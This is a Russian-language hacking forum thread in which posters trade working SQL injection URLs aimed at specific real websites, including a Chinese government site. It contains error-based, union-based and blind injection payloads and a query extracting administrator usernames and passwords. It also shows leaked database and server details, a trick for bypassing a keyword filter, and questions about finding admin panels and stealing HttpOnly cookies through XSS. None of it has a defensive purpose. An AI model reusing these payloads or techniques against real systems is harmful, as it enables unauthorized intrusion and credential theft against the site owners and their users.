нет: Code: http://www.4ips.biz/products.php?id=71+or+1=1+union+select+1,2,3,4+limit+0,1 to use near 'ORDER BY [b]pics_db[/b].pics_id DESC' а названия столбцов только брутить (как и остальных таблиц), кроме столбца pics_id: Code: http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+pics_id+from+pics_db+limit+0,1),floor(rand(0)*2))+from+pics_db+group+by+2+limit+0,1)a)
Можна не знать названия таблицы и какую нить ин-ию вытащить ис переменных и функций! Code: _http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a) Есть admin_db, но там скорее одна запись || пустая -> ошибку не выплевывает! Вот еще путь выдрал, если надо! HTML: Unable to save result set in /hsphere/local/home/sitang/4ips.biz/products.php on line 57
у мну вот такая проблема.. есть уязвимость MSSQL.. и стоит защита типа на SELECT,VERSION,TABLE идт.. с SELECT все испробовал идет тока ('sel'+'ect') как дальше я хД всевремя перекидует на www.site.ru/Rejected-By-UrlScan/?~/products.asp?cat=select з.ы (('sel'+'ect')+top+1+???+FROM+INFORMATION _SCHEMA.????)
Есть такая скуль __http://www.ykjw.gov.cn/newsinfo.php?id=-214+union+select+1,group_concat(concat(uid,0x3a,pwd)),3,4,5,6+from+administrator никак не могу админку найти доступ к mysql.user закрыт и file_priv=NO как тут можно выкрутиться?
Блин, подскажите директории где обычно бывают админки или как её вообще найти. Robots.txt нету, структуру сайта сканил - ничего, визуально тоже нет такого, самые простые URLы подставлял (/admin,/admin.php и т.д.) - ничего. Заранее спасибо
Помогите определить версию БД http://www.opderschmelz.lu/index.php?id=10;event=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a) http://www.opderschmelz.lu/admin/ набираю 'or+5=5/* не проходит
Code: http://www.opderschmelz.lu/index.php?id=10;event=415+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version(),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+limit+1,1/* 5.0.32-Debian_7etch10-log
Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю: http://www.lavozindependiente.com/news.php?nid=517' Что то сам пытался.. http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=false http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=true
Вопрос по XSS Подскажите как можно получить все куки, если часть куков имеют флаг HttpOnly, и javascript не может получить доступ к ним. Пробовал использовать обьект XMLHttpRequest, но и он не может извлечь куки.
Code: http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5 @@tmpdir: /tmp @@basedir: /usr/ version(): 5.1.44 @@datadir: /var/lib/mysql/ @@version_compile_os: redhat-linux-gnu user(): [email protected] database(): lavozi_lavozindependiente_com_-_db дальше сложнее, т.к. и union и select фильтруются неподецки
Здравствуйте есть скуля http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+id,2,3,4,5,6,7+FROM+'Users'+limit+1,1/* через INFORMATION_SCHEMA.TABLES нашел табл. users пытаюсь вывести не хочет выводить может прав нету или она в другой бд висит?
Code: http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+count(id),2,3,4,5,6,7+from+users/* 1 - запись только. Users в кавычки брать не надо
